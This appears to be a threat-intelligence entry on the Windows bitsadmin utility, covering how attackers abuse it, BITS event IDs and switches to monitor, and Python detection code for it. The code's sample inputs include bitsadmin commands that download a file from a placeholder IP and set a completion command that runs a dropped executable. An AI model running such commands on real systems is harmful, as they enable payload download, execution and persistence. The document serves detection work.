e1057a20945bce8f00c0be5e3db40c4a98ab33f42f4d2df919aedb0ef6651d6e
Author: Microsoft
Source: Wild
Threat: LOLBin
Summary
The BITS administration utility allows you to create jobs and monitor the progress of those jobs.
EchoTrail Prevalence Score (EPS)
21.97
Rank Analysis
Host Prevalence
2.9%
Execution Rank
33,215th
Behavioral Analysis
Top Filenames
Top Paths
C:\Windows\System32
100.00 %
Top Network Ports
No results found.
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
No results found.
Security Analysis
Intel
BITSAdmin is a command-line tool for managing the Background Intelligent Transfer Service (BITS). It can create download and upload jobs, add files to them, and monitor their progress. The same functionality is exposed through the BITS PowerShell cmdlets (for example Start-BitsTransfer) and through the BITS COM API, so not every BITS job originates from bitsadmin.exe. Documented abuse of the tool includes downloading malicious payloads, running an arbitrary command when a job completes (SetNotifyCmdLine), persisting across reboots because BITS jobs survive them, and staging tooling for lateral movement.

Why is monitoring the usage of BITSAdmin important? In no particular order:
1. If you patch your systems, there is a good chance that the update solution itself uses the BITS service to download and apply updates, so BITS network activity is normal on most hosts and an attacker's transfer blends in.
2. If application allow-listing has been implemented in your environment, it is common for a default rule to trust or execute Microsoft-signed applications and binaries, which includes bitsadmin.exe.
3. The same applies to antivirus products: bitsadmin.exe is a signed Microsoft binary, so its execution alone will not raise an alert.

The binary locations for BITSAdmin are:
C:\Windows\System32\bitsadmin.exe
C:\Windows\SysWOW64\bitsadmin.exe

Native Windows event logs are also available for monitoring BITS activity. They live in the Microsoft-Windows-Bits-Client/Operational channel (Event Viewer: Applications and Services Logs -> Microsoft -> Windows -> Bits-Client -> Operational). Because these events are written by the BITS service rather than by bitsadmin.exe, they also record jobs created through PowerShell or the COM API, which a process-creation alert on bitsadmin.exe would miss.
Event ID 3 - BITS service created a new job
Event ID 4 - The transfer job is complete
Event ID 5 - The job is cancelled
Event ID 59 - BITS started the transfer job; the message includes the download or upload URL
Event ID 60 - BITS stopped the transfer job; the message also includes the download or upload URL
If you forward process-creation logs to Syslog or another log aggregator, pay particular attention to the following bitsadmin command-line options (the list is not exhaustive):
/Transfer - creates a job, adds the file and starts the transfer in one command
/Create - creates a new job
/AddFile - adds a remote URL and local file name to a job
/SetNotifyFlags - sets which events (completion, error, modification) trigger a notification
/SetNotifyCmdLine - sets a program to run when the job finishes or errors
/SetMinRetryDelay - shortens the wait between retries after a transient error
/SetCustomHeaders - adds custom HTTP headers to the job's requests
/Resume - starts a new job or restarts a suspended one
Depending on how BITSAdmin was invoked, PowerShell logs (script block logging, Event ID 4104, will capture Start-BitsTransfer and friends) and Admin logs could also contain information relating to BITS activity.
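The two detections described above, command-line inspection of bitsadmin.exe for the watched verbs and URL extraction from Bits-Client/Operational events 59 and 60, as a worked example. This is added code, not EchoTrail's or Microsoft's. The sample process records mimic the shape of Sysmon Event ID 1 (image plus command line) and the sample BITS-Client records mimic events 3, 4 and 59; their wording, job names and the 203.0.113.0/24 addresses (RFC 5737) are constructed, and the URL regex assumes the URL appears as a plain http(s) token in the message rather than reproducing Microsoft's exact message template.

```python
"""Detection logic for bitsadmin.exe abuse, run over constructed sample events.

Added example, not code from EchoTrail or Microsoft. Event shapes, job names and
the 203.0.113.0/24 addresses (RFC 5737) are constructed for illustration.
"""
import re
from typing import Optional

# Command-line verbs the write-up singles out (lowercase, no leading slash).
WATCHED_VERBS = {
    "transfer", "create", "addfile", "setnotifyflags", "setnotifycmdline",
    "setminretrydelay", "setcustomheaders", "resume",
}
# Microsoft-Windows-Bits-Client/Operational event IDs named in the write-up.
BITS_CLIENT_EVENTS = {3: "job created", 4: "transfer complete", 5: "job cancelled",
                      59: "transfer started", 60: "transfer stopped"}
# Expected locations of the signed binary; anything else is a copy worth a look.
KNOWN_IMAGES = {r"c:\windows\system32\bitsadmin.exe",
                r"c:\windows\syswow64\bitsadmin.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # whitespace split that keeps "quoted args"


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, dropping the quotes around quoted arguments."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_bitsadmin(cmdline: str) -> Optional[dict]:
    """Return switches, URLs and the notify program from a bitsadmin command line,
    or None when argv[0] is not bitsadmin."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in ("bitsadmin", "bitsadmin.exe"):
        return None
    verbs = {t[1:].lower() for t in tokens[1:] if t.startswith("/")}
    notify_program = None
    for i, t in enumerate(tokens):
        # /SetNotifyCmdLine <job> <program> <parameters>
        if t.lower() == "/setnotifycmdline" and i + 2 < len(tokens):
            notify_program = tokens[i + 2]
    return {"verbs": verbs, "urls": URL_RE.findall(cmdline),
            "notify_program": notify_program}


def triage_process_event(event: dict) -> Optional[dict]:
    """Score one process-creation record; None when it is not a bitsadmin execution."""
    parsed = parse_bitsadmin(event["cmdline"])
    if parsed is None:
        return None
    reasons = []
    hits = sorted(parsed["verbs"] & WATCHED_VERBS)
    if hits:
        reasons.append("watched verbs: " + ",".join(hits))
    if parsed["urls"]:
        reasons.append("remote URL on command line")
    if parsed["notify_program"]:
        reasons.append("job-completion command: " + parsed["notify_program"])
    if event["image"].lower() not in KNOWN_IMAGES:
        reasons.append("bitsadmin.exe outside System32/SysWOW64")
    # Benign admin use (e.g. /list) is still returned, just not marked suspicious.
    return {"cmdline": event["cmdline"], "reasons": reasons, "suspicious": bool(reasons)}


def parse_bits_client_event(event_id: int, message: str) -> dict:
    """Name the event and pull any http(s) URL out of its message text (assumed format)."""
    return {"event_id": event_id,
            "meaning": BITS_CLIENT_EVENTS.get(event_id, "other"),
            "urls": URL_RE.findall(message)}


def run_triage(process_events: list, bits_events: list) -> dict:
    """Run both detections and return the findings instead of printing them."""
    findings = [f for f in map(triage_process_event, process_events) if f]
    urls = [(eid, u) for eid, msg in bits_events
            for u in parse_bits_client_event(eid, msg)["urls"]]
    return {"process_findings": findings, "bits_log_urls": urls}


# Constructed sample input: three bitsadmin executions and one unrelated process.
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer updjob /download /priority high "
                r"http://203.0.113.10/u.dat C:\Users\Public\u.dat"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /SetNotifyCmdLine stagejob C:\Users\Public\u.exe NULL"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers /verbose"},   # admin looking at jobs
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]
SAMPLE_BITS_EVENTS = [  # constructed Bits-Client/Operational records (id, message)
    (3, r"BITS service created a new job. Transfer job: updjob, Owner: LAB\user"),
    (59, "BITS started the updjob transfer job that is associated with the "
         "http://203.0.113.10/u.dat URL."),
    (4, r"The transfer job is complete. Transfer job: updjob, Owner: LAB\user"),
]

if __name__ == "__main__":
    result = run_triage(SAMPLE_PROCESS_EVENTS, SAMPLE_BITS_EVENTS)
    for f in result["process_findings"]:
        print("SUSPICIOUS" if f["suspicious"] else "observed  ", f["cmdline"], f["reasons"])
    for eid, url in result["bits_log_urls"]:
        print("Bits-Client event", eid, BITS_CLIENT_EVENTS[eid], url)
```

Against the constructed input the /transfer and /SetNotifyCmdLine executions are flagged, the /list query is recorded but not flagged, the svchost.exe BITS host process is ignored, and the only URL recovered from the event log comes from the event 59 record. In production the same two functions would be fed from your process-creation telemetry and from a Get-WinEvent export of the Bits-Client/Operational channel, which is where jobs created via PowerShell or the COM API show up even though bitsadmin.exe never ran.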